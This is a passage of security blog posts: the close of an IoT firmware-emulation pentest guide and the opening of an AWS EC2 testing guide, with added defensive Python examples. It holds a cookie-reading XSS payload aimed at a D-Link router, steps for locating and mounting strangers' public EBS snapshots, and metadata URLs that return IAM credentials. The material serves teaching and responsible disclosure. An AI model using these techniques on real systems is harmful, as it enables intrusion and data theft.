<br />
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">$ nmap -p- -sV -T4 192.168.0.100</span></div>
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-19 17:12 CEST</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Nmap scan report for 192.168.0.100</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Host is up (0.00070s latency).</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Not shown: 65532 closed ports</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">PORT STATE SERVICE VERSION</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>22/tcp open ssh Dropbear sshd 0.51 (protocol 2.0)</b></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>80/tcp open http lighttpd 1.4.18</b></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"><b>443/tcp open ssl OpenSSL (SSLv3)</b></span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></div>
<div>
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikttT9NZzJZ-6f1KiKJeUmPRxcR7rfmrY5GzDfsrj0Sbh9nPxcSNr5mIShtoooXcWev32AkcmZX_S0D2NNBo8xG3QFmlGaxZVucwfgLHWTsAbwieJ7QXdPxQr-1vX0MmyKjCn0oYj4odMk/s1600/Selection_001.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="452" data-original-width="1429" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikttT9NZzJZ-6f1KiKJeUmPRxcR7rfmrY5GzDfsrj0Sbh9nPxcSNr5mIShtoooXcWev32AkcmZX_S0D2NNBo8xG3QFmlGaxZVucwfgLHWTsAbwieJ7QXdPxQr-1vX0MmyKjCn0oYj4odMk/s640/Selection_001.png" style="border: 1pt solid rgb(0, 0, 0);" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div style="font-size: medium; text-align: start;">
<div style="text-align: center;">
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;">Device web interface is listening on port 80. </td></tr>
</tbody></table>
<span id="docs-internal-guid-143b8954-7fff-576e-3b2f-c5e69e44e9e0"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
</div>
<div style="font-size: medium; text-align: start;">
</div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<br />
A pentester who wants to conduct his own manual dynamic analysis, and who is not interested in the "statistic" capabilities of Firmadyne, would find it useful to employ the tool only to extract and emulate a device firmware. With this approach in mind, we created a simple but effective script called <i style="text-align: justify;">firmadyne-launcher</i> to <b>easily automate the emulation of a firmware</b>.<br />
<br />
<div style="text-align: justify;">
After having installed and configured Firmadyne, clone the <i>firmadyne-launcher</i> <a href="https://github.com/mindedsecurity/firmadyne-launcher">repository</a> on your local machine and move <i>firmadyne_launcher.sh</i> into the Firmadyne application folder. The script can then be started, providing a firmware file as its argument.</div>
<br />
<div>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">lcomi@aquarius:~/firmadyne$ ./firmadyne_launcher.sh firmware.zip</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Extracting the firmware...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Getting the architecture...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Creating the image...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Creating TAP device tap7_0...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Set 'tap7_0' persistent and owned by uid 0</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Bringing up TAP device...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Adding route to 192.168.0.100...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Starting firmware emulation... use Ctrl-a + x to exit</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">qemu-system-mips: -net nic,vlan=0: 'vlan' is deprecated. Please use 'netdev' instead.</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] Linux version 2.6.32.70 (vagrant@vagrant-ubuntu-trusty-64) (gcc version 5.3.0 (GCC) ) #1 Thu Feb 18 01:39:21 UTC 2016</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] </span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] LINUX started...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] bootconsole [early0] enabled</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] CPU revision is: 00019300 (MIPS 24Kc)</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] FPU revision is: 00739300</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] Determined physical RAM map:</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 00001000 @ 00000000 (reserved)</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ 0.000000] memory: 000ef000 @ 00001000 (ROM data)</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">[ . . . ]</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Welcome to SDK.</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">Have a lot of fun...</span><br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;"></span>
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">netgear123456 login: </span></div>
<div>
<br />
<h3>
Looking for web vulnerabilities</h3>
<div style="text-align: justify;">
To show that an emulated device can be dynamically tested like a physical one, some interesting web vulnerabilities can be hunted. Below is an example of a new reflected XSS found in the web interface of the D-Link DIR-850L router. The vulnerable firmware can be found <a href="http://files.dlink.com.au/products/DIR-850L/REV_A/Firmware/Firmware_v1.14B07B01/DIR850LA1_FW114WWb07b01.bin">here</a>.</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVHaX6_GO8sZxZ33fRKlLgsh4GHel0bmWcMbtsZPDpwF-IiNkS52HaqD-LVQszpNOqJb1UPLCIy99QhVuj5J87os1GLtzK4IvjAeQPksMIQBYemEWeX0V3hrwi1UK74h6RkKWL1cuEqExQ/s1600/Selection_000xss.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="573" data-original-width="1600" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVHaX6_GO8sZxZ33fRKlLgsh4GHel0bmWcMbtsZPDpwF-IiNkS52HaqD-LVQszpNOqJb1UPLCIy99QhVuj5J87os1GLtzK4IvjAeQPksMIQBYemEWeX0V3hrwi1UK74h6RkKWL1cuEqExQ/s640/Selection_000xss.png" style="border: 1pt solid rgb(0, 0, 0);" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Router login page, the default password is empty.</td></tr>
</tbody></table>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div style="text-align: justify;">
After the login page, which can be passed simply by using the default <a href="https://www.lifewire.com/d-link-default-password-list-2619152">credentials</a>, several menus and configuration options that a user can modify become visible. After mapping some of them with the help of a proxy like Burp, we noticed that a particular handler had a vulnerable parameter that allowed us to trigger an XSS through the following tampered GET request:<br />
<blockquote class="tr_bq">
http://192.168.0.1/[HANDLER]?[PARAM]=&lt;/script&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;</blockquote>
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKTA9nr3vaPQ3QD40bxaqNRddReMRZzJy4Z22Kl7t3zPGLwu6tWYDqimseLoJXg3VzXfpowOuhxTA7fWwA6Zix3csg7EpQ9HdWzWBkeaBBO-uUcOjZ4wAOtHhggt2bfngz6bEWcV24dCOC/s1600/Selection_002xss.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="321" data-original-width="1600" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKTA9nr3vaPQ3QD40bxaqNRddReMRZzJy4Z22Kl7t3zPGLwu6tWYDqimseLoJXg3VzXfpowOuhxTA7fWwA6Zix3csg7EpQ9HdWzWBkeaBBO-uUcOjZ4wAOtHhggt2bfngz6bEWcV24dCOC/s640/Selection_002xss.png" style="border: 1pt solid rgb(0, 0, 0);" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 12.8px;">Execution of the arbitrary JS code inside the victim's browser. </td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br />
The details of this vulnerability, tracked as CVE-2018-17779, are currently redacted to give D-Link time to patch the vulnerable firmware.<br />
<br />
It is suggested to download the aforementioned D-Link firmware and try to find many other vulnerabilities. Another great exercise is to manually extract the device filesystem (following <a href="https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html">the first part</a> of this guide), locate the dynamic analysis findings (such as the XSS-vulnerable web page) in the source code, and then find a way to fix them.</div>
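<div style="text-align: justify;">
As an added illustration of the "find a way to fix them" exercise, the following Python example (written for this page; it is not code from the post, from Firmadyne or from the D-Link firmware) models the bug class behind a reflected XSS in a script context: a hypothetical handler pastes a request parameter into an inline <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">&lt;script&gt;</span> block, so the <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">&lt;/script&gt;&lt;script&gt;...</span> value from the request above terminates the element and opens a new one. The hardened version encodes the value as a JavaScript string literal with <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">&lt;</span> escaped, and a small check counts <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">&lt;/script</span> end tags to confirm the breakout is gone. The template, handler and function names are assumptions made for the example.</div>

```python
import html
import json
import re

# The value carried by the vulnerable parameter in the request shown above.
PAYLOAD = "</script><script>alert(document.cookie)</script>"


def render_vulnerable(param):
    """Hypothetical handler template (constructed for this example, not the
    router's real code): the raw parameter is pasted into an inline script."""
    return ('<html><body><script>\n'
            'var lastValue = "' + param + '";\n'   # no output encoding at all
            '</script></body></html>')


def js_string_literal(value):
    """Encode a Python string as a JavaScript string literal that is safe
    inside an inline <script> element.

    json.dumps escapes quotes, backslashes and control characters, but it
    leaves '<' alone, and the HTML tokenizer ends a script element as soon as
    it sees '</script' in the script data, regardless of JavaScript syntax.
    Escaping every '<' as '\\u003c' (a valid escape in both JSON and JS)
    removes that possibility; '<\\/' for '</' is the common minimal variant.
    """
    return json.dumps(value).replace("<", "\\u003c")


def render_fixed(param):
    """Same template with the parameter encoded for the script context."""
    return ('<html><body><script>\n'
            'var lastValue = ' + js_string_literal(param) + ';\n'
            '</script></body></html>')


def render_fixed_html_context(param):
    """Reflecting the same value into HTML text needs a different encoder:
    encoding is context specific, html.escape is right for this context."""
    return ('<html><body><p>Last value: ' + html.escape(param, quote=True)
            + '</p></body></html>')


_SCRIPT_END = re.compile(r"</script", re.IGNORECASE)


def script_end_tag_count(page):
    """Number of '</script' sequences the browser's tokenizer would act on."""
    return len(_SCRIPT_END.findall(page))


def is_script_breakout(page):
    """The template contains exactly one script element, so more than one
    end tag means untrusted data closed it early (and can open a new one)."""
    return script_end_tag_count(page) > 1


def round_trips(value):
    """The encoded literal still decodes to the original value, so the fix
    loses no data: it changes only how the value is written, not what it is."""
    return json.loads(js_string_literal(value)) == value


if __name__ == "__main__":
    print("vulnerable page breakout:", is_script_breakout(render_vulnerable(PAYLOAD)))  # True
    print("fixed page breakout:     ", is_script_breakout(render_fixed(PAYLOAD)))       # False
    print("value preserved:         ", round_trips(PAYLOAD))                            # True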
<div style="text-align: justify;">
<br /></div>
<h3>
Conclusions</h3>
<div style="text-align: justify;">
In this article we showed how a device firmware can be emulated and what the main advantages and limitations of this technique are. Thanks to it, a new vulnerability in the D-Link DIR-850L web interface was found without having the physical device.<br />
<br />
This post closes our IoT pentesting series, in which both the static and the dynamic approach to firmware security review have been discussed. It is important to underline that IoT manufacturers have to consider the security of their products a top priority, and researchers should be free to test devices, find new vulnerabilities and responsibly disclose them.</div>
<br />
<div>
<h3>
References</h3>
</div>
<div>
<ul>
<li>https://github.com/firmadyne/firmadyne/blob/master/paper/paper.pdf</li>
<li>https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html</li>
</ul>
</div>
<div>
<br /></div>
</div>
</div>
Lorenzo Comi (http://www.blogger.com/profile/08777059741084155036)<br />
<br />
<b>A practical guide to testing the security of Amazon Web Services (Part 2: AWS EC2)</b><br />
Published 2018-09-18T08:55:00.000-07:00, updated 2018-09-28T03:45:30.885-07:00<br />
<br />
This is Part 2 of 3 of our practical guide to testing the security of Amazon Web Services. We are tackling the main services provided by Amazon for its cloud-based platform to support web applications, and we started by discussing AWS S3 buckets and their security. You can get a short overview of AWS and catch up on the important aspects of testing AWS S3 by reading our <a href="http://blog.mindedsecurity.com/2018/09/a-practical-guide-to-testing-security.html" target="_blank">previous post</a>.<br />
<br />
In this second part, we describe another important AWS service used on a daily basis by many users: Elastic Compute Cloud or, more commonly, EC2.<br />
<h2>
AWS EC2</h2>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz1BY_O6Ho3W_3OEWotXZjtF4th_5Hnzq1M6rTAjfs8L35vDaNy4Kuh12gFq7HaIWJwUpRFNqORvpHsSD-qvm6hyp8PItoVsCIxd3dB-J2E82HBq7Z0TV1MAQ5pUYgaTu4tFAUf-t0VuvX/s1600/Compute_AmazonEC2.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="400" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz1BY_O6Ho3W_3OEWotXZjtF4th_5Hnzq1M6rTAjfs8L35vDaNy4Kuh12gFq7HaIWJwUpRFNqORvpHsSD-qvm6hyp8PItoVsCIxd3dB-J2E82HBq7Z0TV1MAQ5pUYgaTu4tFAUf-t0VuvX/s200/Compute_AmazonEC2.png" /></a>Elastic Compute Cloud (EC2) is another widely used service offered by Amazon. It allows users to rent virtual computers on which to run arbitrary applications. AWS EC2 provides a scalable way to deploy a new computer, which in AWS terminology is called an "instance", and manage its status via a web-based user interface. The user can manage every aspect of an EC2 instance, from its creation and execution to the definition of access policies. It is undeniable that AWS EC2 constitutes a powerful tool that, if not properly configured and protected, will inevitably result in a security breach. AWS EC2 instances provide many different features. In this post we discuss two of them that are particularly relevant from a security perspective: Elastic Block Store and the Instance Metadata Service.<br />
<br />
AWS EC2 instances can benefit from other AWS services to which they have been granted access. A typical example, which we first introduced in Part 1 and explore further here, is the synergy between AWS EC2 instances and AWS S3 buckets. When an AWS EC2 instance is created it requires, as all computers do, a persistent storage unit where data can be saved. Amazon therefore provides Elastic Block Store (EBS), a block-level persistent storage solution that can be attached to an AWS EC2 instance. An EBS block thus constitutes an important part of an AWS EC2 instance, as it stores the data processed by the instance itself. Given its importance, it is convenient to be able to take snapshots of an EBS block and store them safely so that, in case of failure, the AWS EC2 instance can be restored to a known-good state. To this end, Amazon offers the possibility of taking EBS snapshots and storing them in its storage service, AWS S3.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7DdxiUXZWys249WDN7byDwIlJWPlTNqcem4i5Uzxm4J0Io4ZaQAYCtTcXb1mYho9lLVcpd_OjuU2L_oVtK68QOhT6Ln8n49KFUXGejOO6D1f1vFyfS9RrGE31s4GHURy-tGcYgV9_5icE/s1600/Disegno+senza+titolo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="355" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7DdxiUXZWys249WDN7byDwIlJWPlTNqcem4i5Uzxm4J0Io4ZaQAYCtTcXb1mYho9lLVcpd_OjuU2L_oVtK68QOhT6Ln8n49KFUXGejOO6D1f1vFyfS9RrGE31s4GHURy-tGcYgV9_5icE/s400/Disegno+senza+titolo.png" /></a></div>
<br />
<br />
Let's now discuss another interesting feature that AWS EC2 instances have access to, called the Instance Metadata Service (IMS). IMS allows any AWS EC2 instance to retrieve data about the instance itself that can be used to configure or manage the running instance. The data available from the IMS ranges from the hostname of the instance to the initialization script that is executed when the instance is launched. All this information can be retrieved only from within the AWS EC2 instance, by querying a specific API end-point located at <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">http://169.254.169.254</span>.<br />
As will become clear in the remainder of this post, this end-point provides valuable information that an attacker might use to compromise not only the AWS EC2 instance but other services as well. The documentation for the IMS, in fact, states the following:<br />
<blockquote class="tr_bq">
Although you can only access instance metadata and user data from within the instance itself, the data is not protected by cryptographic methods. Anyone who can access the instance can view its metadata. Therefore, you should take suitable precautions to protect sensitive data (such as long-lived encryption keys). You should not store sensitive data, such as passwords, as user data.</blockquote>
IMS is thus a crucial aspect to consider when analyzing the security of AWS EC2 instances.<br />
<h3>
Publicly accessible EC2 snapshots</h3>
As just mentioned, EBS snapshots are, by default, stored in a private AWS S3 bucket that is not directly accessible via the S3 dashboard. However, EBS snapshots can be managed via the AWS EC2 interface, and their permissions can be changed to make them public. Needless to say, <b>you should never do that</b>.<br />
From a security perspective, if you are carrying out a penetration testing activity and come across possibly publicly accessible EBS snapshots, you could try to access the EBS block by mounting it in an EC2 instance under your control. Think of an EBS block as a virtual disk that you can mount as you normally would. To mount an EBS block you thus need two things:<br />
<br />
<ol>
<li>an AWS EC2 instance under your control where you can mount the EBS block</li>
<li>the ID that identifies the snapshot</li>
</ol>
<br />
For (1) I recommend you check out the AWS documentation on <a href="https://docs.aws.amazon.com/efs/latest/ug/gs-step-one-create-ec2-resources.html" target="_blank">how to create and launch an EC2 instance</a>. For (2) you can use the aws command to search for publicly accessible EBS snapshots as follows:<br />
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">aws --profile [PROFILE] ec2 describe-snapshots --filters [FILTERS] --region [REGION]</span><br />
<br />
This command responds with a JSON document listing all the publicly available snapshots that satisfy the values specified by the <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">--filters</span> flag (for a complete description of the filters you can use, <a href="https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-snapshots.html" target="_blank">check the documentation</a>). The JSON contains some information about each snapshot along with the corresponding SnapshotId value that we need. For example, assuming that we want to list all the publicly accessible snapshots whose description contains the word <i>backup</i> and which are located in the <i>us-east-2</i> region, this is what we would do:<br />
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">aws --profile default ec2 describe-snapshots --filters Name=description,Values="*backup*" --region us-east-2</span><br />
<b><br /></b>
The result of executing such a command is a JSON document listing all the publicly accessible snapshots satisfying our search criteria.<br />
<br />
<br />
<!-- BEGIN JSON -->
<br />
<div style="background: #f2f2f2; border: 1px solid #8c8c8c; font-family: "courier new" , "courier" , monospace; font-size: 10pt; padding: 5px;">
{<br />
"Snapshots": [<br />
{<br />
"Description": "Phoenix_competitor_analysis_backup_set",<br />
"Encrypted": false,<br />
"VolumeId": "vol-ffffffff",<br />
"State": "completed",<br />
"VolumeSize": 100,<br />
"StartTime": "2017-08-30T05:24:48.000Z",<br />
"Progress": "100%",<br />
"OwnerId": "234190327268",<br />
"SnapshotId": "snap-0dc716aaf28921496"<br />
},<br />
{<br />
"Description": "backup",<br />
"Encrypted": false,<br />
"VolumeId": "vol-0b21c8a6c158367fc",<br />
"State": "completed",<br />
"VolumeSize": 8,<br />
"StartTime": "2018-05-21T13:01:49.000Z",<br />
"Progress": "100%",<br />
"OwnerId": "388304843501",<br />
"SnapshotId": "snap-041c06c0c3658323c"<br />
},<br />
{<br />
"Description": "backup",<br />
"Encrypted": false,<br />
"VolumeId": "vol-0ee056a878d9dfdb1",<br />
"State": "completed",<br />
"VolumeSize": 30,<br />
"StartTime": "2018-01-07T13:52:56.000Z",<br />
"Progress": "100%",<br />
"OwnerId": "682345607706",<br />
"SnapshotId": "snap-0e793674b08737e95"<br />
},<br />
{<br />
"Description": "copy of backup sprerdda - BAckup-17-8-2018",<br />
"Encrypted": false,<br />
"VolumeId": "vol-ffffffff",<br />
"State": "completed",<br />
"VolumeSize": 30,<br />
"StartTime": "2018-08-22T15:03:48.179Z",<br />
"Progress": "100%",<br />
"OwnerId": "869858413856",<br />
"SnapshotId": "snap-02326682d84d3aedd"<br />
}<br />
]<br />
}</div>
<!-- END JSON -->
<b><br /></b>
Once you have identified the snapshot of interest, you have to create an EBS volume from that snapshot in order to be able to mount it. The following command does just that and creates an EBS volume in your account. Note that EBS snapshots are regional, so the availability zone (and <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">--region</span>) must belong to the region where the snapshot lives; a snapshot from another region has to be copied there first.<br />
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id [SNAPSHOT_ID]</span>
<br />
<br />
<div>
<span id="docs-internal-guid-eaada01b-7fff-0173-6c80-1928a9d680ea"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Finally, from your AWS console, create an EC2 instance and mount the newly created EBS volume in it.</span></span></div>
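<div style="text-align: justify;">
On the defender's side, the same API answers the question "are any of <i>my</i> snapshots public?". The added Python example below (not part of the post, nor of the AWS CLI or SDK) audits a constructed <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">describe-snapshots</span> document together with per-snapshot <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">describe-snapshot-attribute</span> output, flags snapshots that are public, unencrypted or shared with other accounts, and emits the <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">modify-snapshot-attribute</span> command that revokes the public createVolumePermission. All account ids, snapshot ids and descriptions are made-up placeholders, not the ones listed above.</div>

```python
import json

# Constructed sample, shaped like the output of
#   aws ec2 describe-snapshots --owner-ids self --region us-east-2
# (ids and descriptions are made-up placeholders, not those in the post).
DESCRIBE_SNAPSHOTS = json.loads("""
{
  "Snapshots": [
    {"Description": "nightly db backup", "Encrypted": false,
     "VolumeId": "vol-0aaaaaaaaaaaaaaaa", "State": "completed", "VolumeSize": 30,
     "StartTime": "2018-09-01T02:00:00.000Z", "OwnerId": "111111111111",
     "SnapshotId": "snap-0aaaaaaaaaaaaaaaa"},
    {"Description": "golden image", "Encrypted": true,
     "VolumeId": "vol-0bbbbbbbbbbbbbbbb", "State": "completed", "VolumeSize": 8,
     "StartTime": "2018-08-15T10:30:00.000Z", "OwnerId": "111111111111",
     "SnapshotId": "snap-0bbbbbbbbbbbbbbbb"},
    {"Description": "scratch", "Encrypted": false,
     "VolumeId": "vol-0ccccccccccccccccc", "State": "completed", "VolumeSize": 100,
     "StartTime": "2018-09-10T18:45:00.000Z", "OwnerId": "111111111111",
     "SnapshotId": "snap-0ccccccccccccccccc"}
  ]
}
""")

# Constructed per-snapshot output, shaped like
#   aws ec2 describe-snapshot-attribute --attribute createVolumePermission --snapshot-id <id>
# A {"Group": "all"} entry is exactly what makes a snapshot public.
SNAPSHOT_ATTRIBUTES = {
    "snap-0aaaaaaaaaaaaaaaa": {"SnapshotId": "snap-0aaaaaaaaaaaaaaaa",
                               "CreateVolumePermissions": [{"Group": "all"}],
                               "ProductCodes": []},
    "snap-0bbbbbbbbbbbbbbbb": {"SnapshotId": "snap-0bbbbbbbbbbbbbbbb",
                               "CreateVolumePermissions": [{"UserId": "222222222222"}],
                               "ProductCodes": []},
    "snap-0ccccccccccccccccc": {"SnapshotId": "snap-0ccccccccccccccccc",
                               "CreateVolumePermissions": [],
                               "ProductCodes": []},
}


def audit_snapshots(describe_output, attributes):
    """Join both documents and classify each snapshot's exposure."""
    findings = []
    for snap in describe_output["Snapshots"]:
        sid = snap["SnapshotId"]
        perms = attributes.get(sid, {}).get("CreateVolumePermissions", [])
        public = any(p.get("Group") == "all" for p in perms)
        shared_with = sorted(p["UserId"] for p in perms if "UserId" in p)
        issues = []
        if public:
            issues.append("PUBLIC")                 # anyone can create a volume from it
        if not snap.get("Encrypted", False):
            issues.append("UNENCRYPTED")            # data readable as soon as it is mounted
        if shared_with:
            issues.append("SHARED:" + ",".join(shared_with))
        findings.append({"snapshot_id": sid,
                         "description": snap.get("Description", ""),
                         "size_gib": snap.get("VolumeSize"),
                         "public": public,
                         "encrypted": snap.get("Encrypted", False),
                         "shared_with": shared_with,
                         "issues": issues})
    return findings


def remediation_commands(findings, region):
    """AWS CLI commands that revoke the public createVolumePermission."""
    return [("aws ec2 modify-snapshot-attribute --snapshot-id {sid} "
             "--attribute createVolumePermission --operation-type remove "
             "--group-names all --region {region}").format(sid=f["snapshot_id"], region=region)
            for f in findings if f["public"]]


def report(findings):
    """One line per snapshot: id, size, description and the issues found."""
    lines = []
    for f in findings:
        status = ", ".join(f["issues"]) if f["issues"] else "ok"
        lines.append("{:<22} {:>5} GiB  {:<20} {}".format(
            f["snapshot_id"], f["size_gib"], f["description"], status))
    return "\n".join(lines)


if __name__ == "__main__":
    found = audit_snapshots(DESCRIBE_SNAPSHOTS, SNAPSHOT_ATTRIBUTES)
    print(report(found))
    for cmd in remediation_commands(found, "us-east-2"):
        print(cmd)
```

In a real run, feed the script the two JSON documents produced by the CLI (one describe-snapshots call with <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">--owner-ids self</span>, then one describe-snapshot-attribute call per snapshot) for every region the account uses; an unencrypted snapshot that has to stay shared is still worth a second look, since whoever can create a volume from it can read everything on it.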
<div>
<h3>
Metadata leakage </h3>
<div>
At the beginning of this post we discussed a peculiar feature of AWS EC2 instances called the Instance Metadata Service (IMS). Recall that IMS allows any AWS EC2 instance to retrieve data about the instance itself that can be used to configure or manage the running instance, and that it is accessible from within the instance itself by querying the end-point located at <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">http://169.254.169.254</span>.</div>
As already mentioned, a lot of juicy information can be retrieved by querying that end-point. The following table summarizes some of the most interesting entries; however, <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories" target="_blank">many more are available</a>.<br />
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border: 1px solid; width: 100%;">
<tbody>
<tr>
<td style="width: 50%;">http://169.254.169.254/latest/meta-data/ami-id</td>
<td style="width: 50%;">The AMI ID used to launch the instance.</td>
</tr>
<tr>
<td style="width: 50%;">http://169.254.169.254/latest/meta-data/iam/security-credentials/</td>
<td style="width: 50%;">If an IAM role is associated with the instance, returns its name (to be used in the next entry).</td>
</tr>
<tr>
<td style="width: 50%;">http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name</td>
<td style="width: 50%;">If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role (for more information, see Retrieving Security Credentials from Instance Metadata). Otherwise, not present.</td>
</tr>
<tr>
<td style="width: 50%;">http://169.254.169.254/latest/user-data</td>
<td style="width: 50%;">Returns the user-defined script that is run when a new EC2 instance boots for the first time.</td>
</tr>
</tbody></table>
</div>
</div>
<br />
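<div style="text-align: justify;">
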